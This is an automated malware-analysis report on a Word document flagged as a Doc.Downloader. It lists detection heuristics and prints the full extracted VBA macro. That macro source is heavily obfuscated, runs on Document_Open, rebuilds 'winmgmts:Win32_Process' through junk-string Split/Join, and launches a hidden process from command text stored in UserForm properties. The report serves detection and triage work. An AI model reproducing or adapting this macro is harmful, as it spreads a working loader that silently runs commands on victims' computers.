MALICIOUS
Risk Score: 232
Heuristics: 8

- ClamAV: Doc.Downloader.Sagent-7465099-0 [critical] CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Downloader.Sagent-7465099-0

- VBA macros detected [medium] (4 related findings) OLE_VBA_MACROS
  Document contains VBA macro code

- VBA UserForm hidden-property command stager [critical] OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
  VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  Matched line in script:
  Gmrruxtnv = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Bhhujcbq.Guqlecwzw + "rocess"

- CreateObject call [high] OLE_VBA_CREATEOBJ
  CreateObject call
  Matched line in script:
  Set Htnnhzcl = VBA.CreateObject(JJKBSKJ + Gmrruxtnv)

- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.

- Document_Open macro [low] OLE_VBA_DOCOPEN
  Document_Open macro
  Matched line in script:
  Private Sub Document_open()

- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (In document text (OLE body))
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11036 bytes |

SHA-256: a70c818013bc4aa9e164ecbb4ba43e0ffe40f72bacf7186788ebab95c41222ef

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 301 of 514 identifiers look randomly generated (e.g. 'Xbsfnwonrotla'), consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script

Attribute VB_Name = "Bhhujcbq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Guqlecwzw, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Wqhxgpmwiqeve = Xbbotshmi
Vqsdhzec = 396
Oabjzfnve = ("Eos.")
Ueivmgxho = (656)
Dim Getvdfjfrbwzj As String
Dim Ftnurdovblkhv As Boolean
Dim Vneptxpeb As Integer
Dim Zlfyfyvmbd As Boolean
Dim Murjsktxomjg As Integer
Dim Uhcppmnfedqc As Integer
Dim Mirdburubo As Boolean
Hjxnbypjenkm = (583)
Dim Ghqnsqdil As Boolean
Gfodafnsvedh = ("Est tempora recusandae.")
Rmwgyyfo = (909)
Dim Jenvgqyystu As String
Feiwttcc = Lbdhbngorlatv
Leffoxhylqcq = Vqljecudjx
Edialiqeio = "Ut laborum asperiores adipisci neque aut voluptas."
Lbddsqzxecwup = 293
Rnjpdlae = Vnsbliid
Wavrxtqcsvtq = 61
Fnpnynpxyb = ("Amelia")
Byrvyori = (925)
Dim Ssskuxmtkfr As Integer
Dim Ysvelcyctcvr As String
Dim Wxeznfpvxv As Double
Dim Rkeqjjvdtccj As Boolean
Dim Ioyqwtdmq As String
Dim Geagdvaqt As String
Dim Ycsmvoruvvt As String
Bwgyuoeuildfv = (180)
Dim Gcsmvuqwxkx As Integer
Vaknwdegpbve = ("Earum.")
Prohaqansdgm = (320)
Dim Aioxzjyibq As Boolean
Sjrbwhpaaej = Yvihggjatggmy
Uhqyyjyqvrgzx = Vzlaaoqauk
Ydloycsgtok = "Iste rerum adipisci fuga."
Aenqahmzjlg = 172
Xbsfnwonrotla = Kttpxxvjlnj
Yuteibyzsgn = 967
Rztfitowi = ("Est.")
Ktccsgrehypxv = (521)
Dim Yrrrmfbq As Boolean
Dim Pgfpatpmuuozw As String
Dim Pjghccyqeu As Boolean
Dim Qvticvfca As Integer
Dim Hfzkavpzukf As Boolean
Dim Vjeurqavdnzr As String
Dim Ldqeldvzcc As Double
Upucvkyyntrll = (134)
Dim Sdratzjdwd As String
Tavgbdtvkabs = ("Id repudiandae dolore eum numquam voluptas.")
Cyrlftbrcvkc = (913)
Dim Llyyqqexrnqis As Double
Sbzlaxlm = Ltbyavyeukybd
Oegevxalrjtlr = Zzoaewdz
Rdxfcqyxmlsf = "Sit blanditiis ducimus."
Akhkogkhgtk = 61
Pihlzkcicga
End Sub
Attribute VB_Name = "Vyeoqakxxt"
Attribute VB_Base = "0{9073FB39-2E1C-4746-83A2-96A69A51531E}{01A1C874-C51B-4ABD-824F-0A2D001C09C8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Oinarhrpwwxy"
Function Ujjteelnxf()
Iczpkrbxsfrj = Cboniugn
Rdyqpfkuf = 738
Pxftmuoc = ("Alton")
Hogqsoqjmou = (794)
Dim Xhskinuxeham As Double
Dim Tvzrlcqkor As Integer
Dim Rtktripehmtjf As Boolean
Dim Sdhfdoewn As Boolean
Dim Jxcmsakmvanlq As Integer
Dim Abhcpmvwyhhmw As Boolean
Dim Wwgtysbuts As Boolean
Uferrmhodplx = (504)
Dim Bdfloneidre As Integer
Eygnjptbqtpq = ("Ellen")
Ujhkjjkqyph = (261)
Dim Plbnmvscqw As Double
Hrmkkpvp = Zwgvmknzrf
Eqpgcugm = Ficsxgozmon
Fgriipqevv = "Pariatur veniam beatae iste vitae ea voluptates enim."
Wvdnailglrx = 453
Ewajapcv = Bhhujcbq.Guqlecwzw
Gwfxeyindhu = Noolpphajhbdh
Vtwkoathq = 631
Auafomnnd = ("Sequi aperiam expedita deleniti suscipit corporis inventore.")
Vthomxoeuw = (498)
Dim Sjkkfyug As Integer
Dim Hpnadtopuvli As Double
Dim Caovtmzm As Double
Dim Hwdbioinodm As Boolean
Dim Luvpebes As String
Dim Iifkznlrvo As Boolean
Dim Gqnhgmyuupjz As Double
Xwvkwyyl = (318)
Dim Cejzdlrdetne As Integer
Vrupqsyghypow = ("Alberto")
Yuvvuebdyqiy = (701)
Dim Jmtuypfdiubu As Double
Lkppglfysjist = Zitslylwuyvn
Btzifsobts = Kujmfwrijmi
Yanurlxkmq = "Vitae."
Knvhypbxvn = 938
Anrqtfgp = Ewajapcv + Vyeoqakxxt.Qvtysshpkvvk + Vyeoqakxxt.Mcgxwclnbn + Vyeoqakxxt.Raokfqzn
Izugkvgxkaej = Fnonjqyisl
Ksmawuuv = 791
Xbrvovzmbpv = ("Alison")
Uokrwuah = (570)
Dim Kknljdjpepqpm As Double
Dim Bcigksexrrm As String
Dim Xbthodhk As Boolean
Dim Qiraqxlebo As Integer
Dim Srayffnwtxqg As Boolean
Dim Wjbioczs As Boolean
Dim Ssnzgnkyycjbg As Boolean
Bxfqsskjnbbdt = (380)
Dim Vzydgmro As Integer
Nshouudlj = ("Leo")
Ubafhjaxe = (969)
Dim Yxhjcdjmjjp As Integer
Adutgyrjm = Xyxydrql
Tkgkrabxdwfrv = Ohrgshmb
Dflissdpih = "Ut et."
Ioxqlizwgds = 196
Xuqwgcezqphh = Anrqtfgp + Vyeoqakxxt.Fppravids + Vyeoqakxxt.Kyqvjoudjwp.Factoid
Fpbjrhfxw = Aydwqnubbt
Oyxhbwvrytub = 119
Eqrpfmaesyyq = ("Eileen")
Kayosxnkuze = (816)
Dim Lmhebvxi As String
Dim Mnarjgyjky As Boolean
Dim Yvfjdftws As String
Dim Mprltxvaf As Double
Dim Masgdevqtct As String
Dim Lyrrsohqain As Double
Dim Uempxczhjfrx As Double
Bcrdtkczvfd = (740)
Dim Zalseekjqde As Boolean
Fgctzuqzgoj = ("Quo est voluptates qui debitis.")
Qqvjglqmzhym = (477)
Dim Rfkymycfvxbg As Integer
Qtlbnjouogw = Dgzehlbztvq
Sluyiabzv = Wyeexrebtkyzw
Uhrxyufhqcaq = "Consequatur temporibus."
Rpiadhihxbbqp = 922
Ujjteelnxf = Aabasifsnt + Xuqwgcezqphh + Aabasifsnt
Plvwvanucwrk = Qisfbndjikq
Mxgozgztfgebo = 623
Jyyktpxxolth = ("Darin")
Clfadaxwh = (696)
Dim Wvlboemw As Integer
Dim Klgbhozs As Integer
Dim Zincvyakq As Double
Dim Qggwtmvahgk As Integer
Dim Szyzvmxde As Integer
Dim Ohigpdcgk As Boolean
Dim Ezeocerwzozi As Integer
Abodzjmucild = (795)
Dim Deeysyvyuh As String
Lhnpozykpbnc = ("Erin")
Hkxwczpg = (971)
Dim Kaplabghugxe As Integer
Tmfevcrbon = Byfkdfpsfo
Kovghegcdld = Lkqdimbtqaib
Roogecst = "Odit sunt et quis minus ratione tempora."
Ltjhohpup = 577
End Function
Function Pihlzkcicga()
Fkfzdcfhjo = Otqaceobhkii
Odklvcigxh = 300
Ltpmudstwzeca = ("Maiores alias dolorem iure quam autem culpa minus dolores et.")
Pdvbwxrnbx = (614)
Dim Nnivjoetvlvq As Boolean
Dim Iooyhlkrsdc As Boolean
Dim Btfooxkegod As Boolean
Dim Wspdhewfocy As Integer
Dim Miwuetdyczp As Boolean
Dim Ttlcakdto As String
Dim Ovxiknqh As Double
Lciljkrpuszgb = (24)
Dim Tlcnzvxq As Double
Jwuopiimh = ("Qui enim ipsa aliquam ab facilis.")
Drqalduzbit = (761)
Dim Qbotldnmn As String
Oxbekrtudlqul = Rcqtwpjoynu
Dueqlqmo = Okpzjuzhchx
Vujkeidrpc = "Qui."
Igajuazpmbj = 944
hb32bmmejdn = "23nNNgi3_7&&jjNN#"
Gmrruxtnv = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Bhhujcbq.Guqlecwzw + "rocess"
Gjriqmdi = Mvgfnith
Dwabqbyyqep = 770
Eocxbjzaho = ("Nesciunt.")
Pcdohakrbzj = (199)
Dim Spofsaovkbq As Double
Dim Rxcmvhqmby As Double
Dim Idfzjffshj As Integer
Dim Vonvseamdw As Boolean
Dim Podbsdrqtu As Integer
Dim Ivbwlsdidrrht As Integer
Dim Wxigmutkubdz As Double
Dsaeqmxcdbkt = (855)
Dim Xxwhxkusk As String
Cpkhvitypazqc = ("Laudantium rerum fugiat consequatur.")
Wtthvttlnx = (101)
Dim Cuxkhmhoxmvi As String
Uliygueonbyd = Jdxkqnqer
Evolkxlodyhd = Lqogwmdtcft
Sfapttgcyp = "Veniam."
Dnpofbai = 926
Set Htnnhzcl = VBA.CreateObject(JJKBSKJ + Gmrruxtnv)
Kuohwvlsn = Ksxohhfx
Lmzoabarlw = 821
Kjlkwuuiyiwus = ("Sean")
Pamttfvz = (153)
Dim Twtlabnlnhn As String
Dim Kldnldpewyxkr As String
Dim Vrpjdwdy As String
Dim Ygijeuqneciqr As Integer
Dim Sjxyvbjclqvsd As Integer
Dim Hncqnwgv As Double
Dim Hwnxtezg As Boolean
Mgaevoexsj = (697)
Dim Odvvnbvalo As Double
Oevfrlwmqnna = ("Cupiditate ea.")
Vyrjciauhjbyr = (236)
Dim Nyyafqrtzf As Integer
Qwapuipgxi = Xttwmdtuyb
Pahhdfsevvk = Thpcsmewm
Wugwlmootl = "Necessitatibus ipsum impedit et sed."
Bhcrqypcjvps = 580
Ndmpnxhpe = Gmrruxtnv + Vyeoqakxxt.Wmavoqxmgboj.ControlTipText + Vyeoqakxxt.Nrjoictfpsbhb.ControlTipText
Pusxrfkyrv = Qjzvswqisc
Yusqcpucz = 250
Asrhrydexulf = ("Nostrum eum.")
Wxizbsnhkyxm = (789)
Dim Cbkmxoycbpzjp As Boolean
Dim Nmozvgrmdya As String
Dim Isjeehcwjzid As String
Dim Wszrcorxljnz As Boolean
Dim Phoxheuigv As Integer
Dim Wtdnfvymv As String
Dim Gxsclgar As Boolean
Rgcklwszome = (822)
Dim Sytydradpwdh As Boolean
Cjbfdarembc = ("Qui facere distinctio alias aut unde voluptate ipsam.")
Gmhgzudzdriwa = (434)
Dim Ckydlhqqmga As Integer
Olrvirtq = Dmwpyrtidwd
Czjrqwua = Alranoikwu
Qprrysxxoynj = "Quas."
Zzdunofcvehr = 282
Vukrttxfex = Ndmpnxhpe + Bhhujcbq.Guqlecwzw
Hjbxxozmhbpse = Funeqkpubkv
Ycggobfg = 47
Bkrxjdomevoa = ("Praesentium minima dolor iste voluptate consequatur porro quidem quaerat molestias.")
Gqospanbk = (582)
Dim Fvjedhirbmu As Integer
Dim Frnxrjlyaa As String
Dim Mnqofzzsjeiei As Boolean
Dim Gjztmrbmymp As Boolean
Dim Nqeukgqu As Integer
Dim Wnugdaii As Double
Dim Vfoahmgkasb As Integer
Yftzoucltog = (866)
Dim Rkympebvf As Integer
Emxzftzb = ("Qui vel id quae atque quam rem repellat eaque.")
Vbkbunmecqixb = (680)
Dim Mocxossxsvbwc As Integer
Pfxgvjnkvqpqd = Glcesewdrgde
Tqjydbdzv = Zdhhzbpfzo
Ymusbgaseufb = "Blanditiis assumenda."
Szqphqert = 165
Set Pihlzkcicga = CreateObject(Vukrttxfex)
Rxequqqb = Tfuvrmbdriwxh
Bjyqybkpapfo = 721
Foxseidnji = ("Jacob")
Dfkhuqswsgslj = (601)
Dim Puglyctluz As Boolean
Dim Dqoaqzbx As Integer
Dim Supwcrzvm As Boolean
Dim Zntcwtvkuq As Double
Dim Nogdgclixdl As String
Dim Vbzblynxtd As Double
Dim Xtgfnkolgciw As Double
Tazmvcrrbrvj = (674)
Dim Uqtkeijifckt As Boolean
Fstcnsenyhi = ("Jeanette")
Fsokdbvq = (566)
Dim Xsfjluwbc As Integer
Miysvpng = Ceedqrsgsb
Kvkhjtscffu = Jqrilijxvvob
Ddvkebwyciog = "Fugit dicta dicta."
Phwjbjgaayg = 10
Pihlzkcicga.XSize = False
Xklvlkol = Attzmwskefew
Ktoywvtldgehl = 174
Nxpozpsz = ("Laborum dolores.")
Wdxwozbspksv = (888)
Dim Zzpqnvekwgr As Double
Dim Htgsuldaswo As Double
Dim Cpwllrhbp As Boolean
Dim Blhplgqegkuzi As String
Dim Klngdabgspnlv As Integer
Dim Orthqido As String
Dim Fjhwiposng As String
Iwyzfpaxvve = (760)
Dim Cgbcphxyuxquj As Double
Zshteaiwiqcnn = ("Eaque ut eligendi quis.")
Kfbzgjmqxzx = (244)
Dim Zhfwfaxcnlb As String
Ktmntkhenlsj = Ncktgluwakg
Towtaemztd = Nhjmvnmbl
Dsujynsbglxnp = "Ratione voluptates."
Sfrqtyznselk = 71
Pihlzkcicga.YSize = False
Mcaiommgwkw = Fzecguzoptrq
Kgicteuavqhg = 731
Spyzawtee = ("Deleniti magnam.")
Avzxijsytban = (528)
Dim Aaedouzs As Integer
Dim Avrqtzgcxjtiu As Double
Dim Hphjdsbqwz As Double
Dim Aqpticdxmrc As Double
Dim Vxpxjsfcrgfr As Boolean
Dim Dyeuqxkfmhp As String
Dim Qfzpncohv As Integer
Nhqmjjkbzmaz = (324)
Dim Likqkhhxmowrr As String
Uiimlhjgxwd = ("Pariatur laboriosam.")
Ltqgrsbterl = (554)
Dim Pubqrsrmee As Integer
Wpcbmugktm = Payrvpqxharof
Lgbgpztvd = Sxeurdcdaqtz
Nuewxowepvd = "Qui in laudantium dolor."
Cyweutdxt = 482
Do While Htnnhzcl.Create(UJNDB & Ujjteelnxf, Mfwatbva, Pihlzkcicga, Tpxiznofetm)
Loop
Kxfhjrufs = Vzlwjnsqktrah
Edpfolfu = 554
Stymdgeu = ("Omnis voluptate quia voluptas.")
Itxjxgumnsxx = (742)
Dim Mrpnamqed As String
Dim Ttegmngfcvl As String
Dim Ihrshofuh As String
Dim Mrqtocepdsdnp As Double
Dim Frsjjali As Integer
Dim Uxwpoxmzfuvw As Integer
Dim Zrvbneucmgj As String
Ykyailbu = (866)
Dim Apvrnklfi As Integer
Ksfjvays = ("Qui laborum ratione.")
Fzvopgtmllw = (431)
Dim Vmsngsbabj As String
Strnkccuqup = Yerswteq
Xcnszipequ = Mczaiuytawski
Iepwxkjtlx = "Henrietta"
Mbqygcar = 378
End Function